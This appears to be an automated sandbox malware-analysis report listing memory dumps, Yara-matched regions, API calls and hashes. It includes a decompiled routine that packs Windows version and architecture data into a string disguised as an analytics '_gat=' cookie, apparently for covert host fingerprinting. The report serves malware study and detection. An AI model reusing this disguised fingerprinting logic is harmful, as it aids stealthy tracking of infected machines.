                                                                                                                                                                                                                                                                • Opcode ID: b347679578338554c1887cea1b6ccc67a7feb60b27102f0a6a7ebeee0e1e3402
                                                                                                                                                                                                                                                                • Instruction ID: 40229e240b02c546bcc1f8a122979a62cadfa4db9ed7e220a6084a1eb454d89a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b347679578338554c1887cea1b6ccc67a7feb60b27102f0a6a7ebeee0e1e3402
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17F0B439209237978B2C5BA8BC88BEA7699F715B807648031FD01C2C20DF20DCD1C7D2
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: o(&$o(&
                                                                                                                                                                                                                                                                • API String ID: 0-2791776686
                                                                                                                                                                                                                                                                • Opcode ID: 399c3278aced804b64ff901822216a5a0360bfef63c2ffc078cbc3d5fe2c15d0
                                                                                                                                                                                                                                                                • Instruction ID: ffa622eb509a816af8d3dd7f882c28ceb1c90dd6cbe90c0ee5fc1e3e0581a0ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 399c3278aced804b64ff901822216a5a0360bfef63c2ffc078cbc3d5fe2c15d0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC117723F30C255B675C81698C1727A95D2DBD825075F533AD826E7284E994DE23D290
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,000FD530), ref: 0025BF2D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InformationTimeZone
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 565725191-0
                                                                                                                                                                                                                                                                • Opcode ID: 3a012cac902326d773b3fc29de59c642129d6ac83116bb51e315cec08646b56e
                                                                                                                                                                                                                                                                • Instruction ID: 23e9859a0fb8a0352c8272b7576e501352e070c11649e74fa5c621ca855c4001
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a012cac902326d773b3fc29de59c642129d6ac83116bb51e315cec08646b56e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEC159759202069FCB269F789C42AEA7BFCEF06351F284059ED80D7291E7308E1DCB58
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00264842,?,?,00000008,?,?,002651A5,00000000), ref: 00264A74
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                • Opcode ID: 2f40cc60a2b539b78dd6bfd98b71d918fcb9c56d8e95c60f75358d7854bdf43a
                                                                                                                                                                                                                                                                • Instruction ID: a4033cf346ae2b6068e8738798ba6b4bbeb89be646980ee1edb8f1dd356eb4ad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f40cc60a2b539b78dd6bfd98b71d918fcb9c56d8e95c60f75358d7854bdf43a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71B15931620609DFDB18DF28C496B657BA0FF45365F298658E8DACF2A1C335EDA1CB40
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3732870572-0
                                                                                                                                                                                                                                                                • Opcode ID: 6d06b5c9f46de25dd857d0f4164dfeef269b619a61adeea4f36b6814e10850c8
                                                                                                                                                                                                                                                                • Instruction ID: 8c64138a27b2759353e3f9304983b60fd231fcf5434f126430698a5108272576
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d06b5c9f46de25dd857d0f4164dfeef269b619a61adeea4f36b6814e10850c8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33111CB1A083098F8308DF29D94495BFBE5FFC8714F058A2EF49993315DB74D9448BA6
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: ced53db901b8c2159507b0c4c59b7cf56df6282483af8a996ce460ef73e6b0e9
                                                                                                                                                                                                                                                                • Instruction ID: af92f73fa8e97ea61a3646724dd2ff0ab81eaac94af2023da86f8679a1bd01ac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ced53db901b8c2159507b0c4c59b7cf56df6282483af8a996ce460ef73e6b0e9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC61673067070756DB389E688CD2BBEB3A5AB4170AF14051EED42DB282E6B09D7DC70D
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.566404835.000000000028F000.00000040.00020000.sdmp, Offset: 0028F000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_28f000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 22b584e9bdf3c9cb250278f6fd8a3c2c048db5b18f95540e02eba2b2880c9613
                                                                                                                                                                                                                                                                • Instruction ID: 87e2e581eb5827ee4121b9ae964050b3aa53acb59707ee89e9b41df608077f2b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22b584e9bdf3c9cb250278f6fd8a3c2c048db5b18f95540e02eba2b2880c9613
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07F1895284E7C11FD75387741C662817FB26E13148B4F8ADBC4D1DF4A3E2889A1EE7A2
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.566404835.000000000028F000.00000040.00020000.sdmp, Offset: 0028F000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_28f000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 8c8f3aa62001406569a41c3bfb129c216f34f5140563f5773fb4b8fd8627cf5d
                                                                                                                                                                                                                                                                • Instruction ID: d8b4679bd89d41974db8a0c5e8240fd0bf0470f97a524e50c867f82340861eaf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c8f3aa62001406569a41c3bfb129c216f34f5140563f5773fb4b8fd8627cf5d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C391545544E3C04FD7078B7458662817FB1AE47118B4F86DBC4C5DF8B3D29C8A4AD7A2
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d20b38bd8d4c53eec952cb7d1260526650306d7ba1f805d70f6a5ea3bc58727f
                                                                                                                                                                                                                                                                • Instruction ID: 0fe6a49df3ddd72fe08485238769c92620401787aac1d71aabd7322d97530977
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d20b38bd8d4c53eec952cb7d1260526650306d7ba1f805d70f6a5ea3bc58727f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F21B673F20539477B0CC47E8C5627DB6E1C68C641745423AF8A6EA2C1D968D917E2E4
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.568355205.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1300000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
                                                                                                                                                                                                                                                                • Instruction ID: bae83fcc66bcc6a22eb89a1af262475e76ef96604cafe247345d7d05cbfbf16c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C11E6773401049FD718CE59EC91FA7B3DAEB99274B298066ED08CB341D676EC41C760
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.566404835.000000000028F000.00000040.00020000.sdmp, Offset: 0028F000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_28f000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
                                                                                                                                                                                                                                                                • Instruction ID: bd7c30fe1f4859fe76dcd54a17fafbcd374f29992c77a97faa611356cd313603
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F711B1773502009FE794EE55DC81EA2B3AAEB89330B298066ED08CB345E675EC52C760
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 48fb06d8dedac0e8ffb7419dced430a7ef92fba206a6a54ae7ad2c7189c407c3
                                                                                                                                                                                                                                                                • Instruction ID: 1b36b69ddbda8170e6627de4d124016c40c4a19081d656e37d25e2d3eb3fad89
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48fb06d8dedac0e8ffb7419dced430a7ef92fba206a6a54ae7ad2c7189c407c3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AE08C32921268EBCB24DB88C90898AF3FCEB89B06B154496B901E3101C270EE05CBD4
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                                                			E000D1C4A(WCHAR* __ecx) {
                                                                                                                                                                                                                                                                				intOrPtr _v256;
                                                                                                                                                                                                                                                                				intOrPtr _v268;
                                                                                                                                                                                                                                                                				intOrPtr _v280;
                                                                                                                                                                                                                                                                				void _v284;
                                                                                                                                                                                                                                                                				void _v296;
                                                                                                                                                                                                                                                                				intOrPtr _v300;
                                                                                                                                                                                                                                                                				WCHAR* _v324;
                                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                                                				int _t29;
                                                                                                                                                                                                                                                                				signed int _t32;
                                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                                                				WCHAR* _t49;
                                                                                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                                                                                				WCHAR* _t57;
                                                                                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                                                                                				signed int _t62;
                                                                                                                                                                                                                                                                				signed int _t63;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t57 = __ecx;
                                                                                                                                                                                                                                                                				_v324 = __ecx;
                                                                                                                                                                                                                                                                				memset( &_v284, 0, 0x11c);
                                                                                                                                                                                                                                                                				_v284 = 0x11c;
                                                                                                                                                                                                                                                                				_t26 = GetProcAddress(LoadLibraryA("NTDLL.DLL"), "RtlGetVersion");
                                                                                                                                                                                                                                                                				if(_t26 == 0) {
                                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                                					_t49 = L"%s%u";
                                                                                                                                                                                                                                                                					_t61 = wsprintfW(_t57, _t49, L"; _gat=", _v280);
                                                                                                                                                                                                                                                                					_t29 = wsprintfW( &(_t57[_t61]), _t49, ".", _v268);
                                                                                                                                                                                                                                                                					_push(_v256);
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					_push( &_v284);
                                                                                                                                                                                                                                                                					if( *_t26() == 0) {
                                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                						_t49 = L"%s%u";
                                                                                                                                                                                                                                                                						_t61 = wsprintfW(_t57, _t49, L"; _gat=", 0);
                                                                                                                                                                                                                                                                						_t29 = wsprintfW( &(_t57[_t61]), _t49, ".", 0);
                                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t62 = _t61 + _t29;
                                                                                                                                                                                                                                                                				_t63 = _t62 + wsprintfW( &(_t57[_t62]), _t49, ".");
                                                                                                                                                                                                                                                                				_t32 = 9;
                                                                                                                                                                                                                                                                				memset( &_v296, 0, _t32 << 2);
                                                                                                                                                                                                                                                                				_t36 = GetProcAddress(LoadLibraryA("KERNEL32.DLL"), "GetNativeSystemInfo");
                                                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                                                					 *_t36( &_v296);
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t53 = 9;
                                                                                                                                                                                                                                                                				return wsprintfW(_v300 + _t63 * 2, _t49, ".", ((0 | _v296 != _t53) - 0x00000001 & 0x00000020) + 0x20) + _t63;
                                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                                0x000d1c5e
                                                                                                                                                                                                                                                                0x000d1c63
                                                                                                                                                                                                                                                                0x000d1c67
                                                                                                                                                                                                                                                                0x000d1c6f
                                                                                                                                                                                                                                                                0x000d1c84
                                                                                                                                                                                                                                                                0x000d1c8c
                                                                                                                                                                                                                                                                0x000d1cc3
                                                                                                                                                                                                                                                                0x000d1ccd
                                                                                                                                                                                                                                                                0x000d1cdf
                                                                                                                                                                                                                                                                0x000d1ceb
                                                                                                                                                                                                                                                                0x000d1ced
                                                                                                                                                                                                                                                                0x000d1c8e
                                                                                                                                                                                                                                                                0x000d1c92
                                                                                                                                                                                                                                                                0x000d1c97
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1c99
                                                                                                                                                                                                                                                                0x000d1c9f
                                                                                                                                                                                                                                                                0x000d1caf
                                                                                                                                                                                                                                                                0x000d1cbd
                                                                                                                                                                                                                                                                0x000d1cbf
                                                                                                                                                                                                                                                                0x000d1cbf
                                                                                                                                                                                                                                                                0x000d1c97
                                                                                                                                                                                                                                                                0x000d1cf1
                                                                                                                                                                                                                                                                0x000d1d06
                                                                                                                                                                                                                                                                0x000d1d0a
                                                                                                                                                                                                                                                                0x000d1d14
                                                                                                                                                                                                                                                                0x000d1d22
                                                                                                                                                                                                                                                                0x000d1d2a
                                                                                                                                                                                                                                                                0x000d1d31
                                                                                                                                                                                                                                                                0x000d1d31
                                                                                                                                                                                                                                                                0x000d1d37
                                                                                                                                                                                                                                                                0x000d1d67

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 000D1C67
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(NTDLL.DLL,RtlGetVersion,7742C0B0,000D45C0,00000000), ref: 000D1C7D
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000D1C84
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D1CAD
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D1CBD
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D1CD9
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D1CEB
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D1CFD
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(KERNEL32.DLL,GetNativeSystemInfo), ref: 000D1D1B
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000D1D22
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D1D56
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: wsprintf$AddressLibraryLoadProc$memset
                                                                                                                                                                                                                                                                • String ID: %s%u$; _gat=$GetNativeSystemInfo$KERNEL32.DLL$NTDLL.DLL$RtlGetVersion
                                                                                                                                                                                                                                                                • API String ID: 345964358-2230512533
                                                                                                                                                                                                                                                                • Opcode ID: c51038d77ea50a73f719701958579756483e1020c9545da410b382e5c8471606
                                                                                                                                                                                                                                                                • Instruction ID: 74fe0bc559d715e254ba92cdc1943c90d4e95bbc22ef82f01907923eb1b5733e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c51038d77ea50a73f719701958579756483e1020c9545da410b382e5c8471606
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E3198726507047FE3109BA4FC46FAA7B9CEB44B40F410927FA05D7391FA75EA0446B5
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00003020), ref: 0012CA4C
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00003020), ref: 0012CA77
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0012CA92
                                                                                                                                                                                                                                                                • MapDialogRect.USER32(?,?), ref: 0012CABA
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,00000020,00000016), ref: 0012CAE4
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0012CAF5
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0012CB07
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015,?), ref: 0012CB2B
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0012CB40
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0012CBA3
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0012CBBA
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0012CBC9
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0012CBF2
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0012CC01
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0012CC0A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Rect$Item$DialogEnableShow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 763981185-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: 32311413cec2120ec7220835569562d4646ab49f8dbcb76c2fa7206595d8bd92
                                                                                                                                                                                                                                                                • Instruction ID: a1db2d2fbffcac5c5b7ce2d29ae12f8980b3ad7097c7a0776093df15b709230f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32311413cec2120ec7220835569562d4646ab49f8dbcb76c2fa7206595d8bd92
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4613A71A00219AFDB14EFA5ED89ABFBBF9FF99700F100129F515A2251DB709911CB60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0011F0A6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 0011F0C9
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000000), ref: 0011F0EC
                                                                                                                                                                                                                                                                • MonitorFromWindow.USER32(00000000,00000001), ref: 0011F155
                                                                                                                                                                                                                                                                • GetMonitorInfoW.USER32(00000000), ref: 0011F15C
                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0011F16A
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0011F177
                                                                                                                                                                                                                                                                • MonitorFromWindow.USER32(00000000,00000002), ref: 0011F184
                                                                                                                                                                                                                                                                • GetMonitorInfoW.USER32(00000000), ref: 0011F18B
                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0011F199
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0011F1A4
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0011F1B1
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0011F1BC
                                                                                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0011F1CA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$Window$Monitor$ClientCopyFromInfoParent$MessagePointsSend
                                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                                • API String ID: 3903363758-3887548279
                                                                                                                                                                                                                                                                • Opcode ID: 1c47bf830cf0795e97dadd442f72ec24231e49187b05296d216509e76245c38e
                                                                                                                                                                                                                                                                • Instruction ID: f0b118cb77ab6e2fbf76bb37c51f31554c522b42bc060e3a8a96477bdd0d1f04
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c47bf830cf0795e97dadd442f72ec24231e49187b05296d216509e76245c38e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF614C72900609EFCB04DFA8ED89BEEB7B9FB89310F150228E505E7150DB74E9468B60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0014EBB7
                                                                                                                                                                                                                                                                • CopyImage.USER32 ref: 0014EBF1
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?,00000184,00151B70,00000000,00000000), ref: 0014EC2B
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0014ECA4
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?,00000000), ref: 0014ECEE
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 0014ED38
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0014ED57
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CopyDeleteH_prolog3_ImageSelect
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1817775128-0
                                                                                                                                                                                                                                                                • Opcode ID: 77d8ccf0fa1af0e30ef3176186ed82fbaae22bc8cf470aaf7c3ab4338c69a0c1
                                                                                                                                                                                                                                                                • Instruction ID: 1831b605c9f295319a1eca9d2c22bd9c9d0e6e3f5e08b21f9e6d4e0633e71d76
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77d8ccf0fa1af0e30ef3176186ed82fbaae22bc8cf470aaf7c3ab4338c69a0c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABA10771901629EFDB259F60DC48BEEBBB4FF19311F0041A9E50DA2260DB709E94DF60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

